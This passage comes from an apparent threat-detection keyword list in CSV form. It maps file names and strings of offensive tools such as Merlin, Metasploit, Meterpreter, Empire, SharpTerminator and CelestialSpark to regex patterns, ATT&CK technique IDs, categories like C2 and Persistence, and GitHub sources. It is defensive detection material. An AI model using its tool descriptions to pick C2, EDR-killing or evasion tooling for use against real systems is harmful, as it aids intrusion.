- T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.WINHTTP*",".{0,1000}merlinHTTP\.WINHTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.WININET*",".{0,1000}merlinHTTP\.WININET.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinServer-*.7z*",".{0,1000}merlinServer\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-*.exe*",".{0,1000}merlinServer\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Linux*",".{0,1000}merlinServer\-Linux.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Linux-x64.7z*",".{0,1000}merlinServer\-Linux\-x64\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*mertdas/RedPersist*",".{0,1000}mertdas\/RedPersist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*mertdas/SharpLDAP*",".{0,1000}mertdas\/SharpLDAP.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*mertdas/SharpTerminator*",".{0,1000}mertdas\/SharpTerminator.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*MessageBox.Show*Pwned*",".{0,1000}MessageBox\.Show.{0,1000}Pwned.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*messagebox_reflective.dll*",".{0,1000}messagebox_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*MessageBoxW(*""Stardust Socket Failed""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sFailed\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*MessageBoxW(*""Stardust Socket Initialization""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sInitialization\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*MessageBoxW(*""We are all made of Stardust!""*",".{0,1000}MessageBoxW\(.{0,1000}\""We\sare\sall\smade\sof\sStardust!\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*MessageDeobfuscation.exe*",".{0,1000}MessageDeobfuscation\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*met_inject.py*",".{0,1000}met_inject\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*metagoofil*",".{0,1000}metagoofil.{0,1000}","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*metame -i *.exe*",".{0,1000}metame\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","563","87","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*Metasploit*",".{0,1000}Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit.go*",".{0,1000}metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*metasploit.rb*",".{0,1000}metasploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit/framework*",".{0,1000}metasploit\/framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit/peass.rb*",".{0,1000}metasploit\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*metasploit_framework.rb*",".{0,1000}metasploit_framework\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*metasploitframework*.msi*",".{0,1000}metasploitframework.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MetasploitPayload.ps1*",".{0,1000}MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*metatwin.ps1*",".{0,1000}metatwin\.ps1.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*metatwin-master*",".{0,1000}metatwin\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*meterpeter.ps1*",".{0,1000}meterpeter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Meterpeter_$RandMe.zip*",".{0,1000}Meterpeter_\$RandMe\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*meterpreter*.rb*",".{0,1000}meterpreter.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*meterpreter.*",".{0,1000}meterpreter\..{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*Meterpreter.ps1*",".{0,1000}Meterpreter\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*meterpreter.sl*",".{0,1000}meterpreter\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*meterpreter_*.rb",".{0,1000}meterpreter_.{0,1000}\.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*meterpreter_loader*",".{0,1000}meterpreter_loader.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*METERPRETER_STAGER*",".{0,1000}METERPRETER_STAGER.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*meterpreter-in-go.exe*",".{0,1000}meterpreter\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 